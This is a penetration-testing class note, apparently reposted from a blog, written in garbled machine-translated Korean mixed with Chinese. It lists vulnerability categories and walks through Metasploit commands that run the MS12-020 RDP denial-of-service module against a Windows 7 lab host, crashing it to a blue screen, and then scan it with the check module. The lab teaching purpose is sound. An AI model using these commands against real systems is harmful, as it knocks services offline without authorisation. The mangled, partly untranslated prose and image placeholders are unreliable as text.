"네트워크 보안 및 침투 테스트"클래스 노트 --- 04

2019년 4월 16일 - -
운영 체제에 취약점
주로 메타 스플로 잇 공격 알려진 취약점에 대한 Windows7의 시스템은 칼리 리눅스 도구를 이용한다.
메타 스플로 잇의 지식 결함 정의, 도입과 사용을 포함하여, 메타 스플로 잇 공격이 자세한 설명
첫째, 취약점은 무엇인가?

漏洞(hole)是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,
				从而可以使攻击者能够在未授权的情况下访问或破坏系统。

취약점 카테고리 :

HTTP 参数污染
后门
Cookie 验证错误
跨站请求伪造
ShellCode
SQL 注入
任意文件下载
任意文件创建
任意文件删除
任意文件读取
其他类型
变量覆盖
命令执行
嵌入恶意代码
弱密码
拒绝服务
数据库发现
文件上传
远程文件包含
本地溢出
权限提升
信息泄漏
登录绕过
目录穿越
解析错误
越权访问
跨站脚本
路径泄漏
代码执行
远程密码修改
远程溢出
目录遍历
空字节注入
中间人攻击
格式化字符串
缓冲区溢出
HTTP 请求拆分
CRLF 注入
XML 注入
本地文件包含
证书预测
HTTP 响应拆分
SSI 注入
内存溢出
整数溢出
HTTP 响应伪造
HTTP 请求伪造
内容欺骗
XQuery 注入
缓存区过读
暴力破解
LDAP 注入
安全模式绕过
备份文件发现
XPath 注入
URL 重定向
代码泄漏
释放后重用
DNS 劫持
错误的输入验证
通用跨站脚本
服务器端请求伪造
跨域漏洞
错误的证书验证

둘째, 도입 및 메타 스플로 잇의 사용

主要是利用已知的漏洞对目标系统加以利用

도구 위치 :

在应用程序  ---> 08-漏洞利用工具集-->metasploit

여기에 그림 삽입 설명
세, 메타 스플로 잇 자세한 공격의
환경은 준비 :
칼리 리눅스
Windows7의
동일한 네트워크 세그먼트에서 그들을
: 다음과 같은 기능을 Windows7의
1을 통해 에너지와 칼리 리눅스 ping이 (확인 방화벽의 Windows7의 꺼져) 여기에 그림 삽입 설명
여기에 그림 삽입 설명
2, 원격 데스크톱이 켜져 여기에 그림 삽입 설명여기에 그림 삽입 설명
Windows7의 스캔 MS12-020의 알려진 취약점
에 칼리 리눅스에서

终端内输入:msfconsole

위의 방법으로 열 수 있습니다 메타 스플 로이트 도구를 엽니 다

여기에 그림 삽입 설명

输入下列命令

search ms12-020		#注释:扫描之后发现存在两个问题,分别是DOS攻击和远程桌面攻击
use  auxiliary/dos/windows/rdp/ms12_020_maxchanne	#注释:先使用第一个漏洞,DOS攻击
show options		显示选项
set rhosts 192.168.247.20	#注释:修改参数,加入目标windows7的ip地址
show options		#注释:再看一下有啥不同之处
run					#注释:运行这个模块

여기에 그림 삽입 설명
여기에 그림 삽입 설명Windows7의 봐, 나는 공격이 성공했음을 나타내는 블루 스크린을 발견했다.
여기에 그림 삽입 설명
허점이 있는지 여부를 원격 데스크톱은 다음 테스트
명령 입력

msfconsole		#注释:打开Metasploit
search ms12-020		#注释:扫描ms12-020
use  auxiliary/scanner/rdp/ms12_020_check	#注释:使用这个漏洞
show options		显示选项
set rhosts 192.168.247.20	#注释:修改参数,加入目标windows7的ip地址
show options		#注释:再看一下有啥不同之处
run					#注释:运行这个模块

여기에 그림 삽입 설명
출현 대상은 취약 (취약 대상)입니다. 원격 데스크톱 단어가 원격 코드 실행을 허용 할 수있을 것이다.

확인을 누른 다음 부록이 포트에 대한 자세한 정보가 제공 여기에 그림 삽입 설명의견, 질문이 (* ¯) ¯)

추천

출처blog.csdn.net/zhaotiannuo_1998/article/details/89338269